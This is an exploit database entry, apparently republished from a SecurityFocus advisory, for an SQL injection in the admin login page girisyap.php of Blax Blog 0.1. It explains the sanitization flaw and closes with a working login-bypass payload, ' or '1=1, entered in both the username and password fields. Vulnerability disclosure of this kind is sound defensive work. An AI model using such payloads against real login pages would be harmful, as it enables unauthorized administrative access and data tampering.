Blax Blog 0.1 - girisyap.php SQL Injection

2010-03-01T00:00:00
ID EXPLOITPACK:BF4ECC84E400E569C4E5A8681AFF847E
Type exploitpack
Reporter cr4wl3r
Modified 2010-03-01T00:00:00

Description

Blax Blog 0.1 - girisyap.php SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/38465/info

Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blax Blog 0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/admin/girisyap.php

Username: ' or '1=1
password: ' or '1=1